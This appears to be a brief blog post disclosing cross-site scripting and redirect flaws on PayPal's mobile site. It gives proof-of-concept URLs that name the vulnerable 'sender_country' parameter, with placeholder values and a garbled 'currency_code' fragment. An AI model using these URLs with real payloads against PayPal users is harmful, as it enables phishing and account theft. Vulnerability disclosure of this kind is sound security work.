Proof of concept :
https://www.sandbox.paypal.com/nvpsm?amount=5.00¤cy_code=USD&sender_country=XSS
https://www.paypal.com/nvpsm?amount=5.00¤cy_code=USD&sender_country=XSS
https://www.paypal.com/nvpsm?amount=5.00¤cy_code=USD&sender_country=Redirect


See also PayPal Mobile site XSS & Redirect Vulnerabilities
Mirror: http://www.xssed.com
1 comment:
Things like that shouldn't happen.
Post a Comment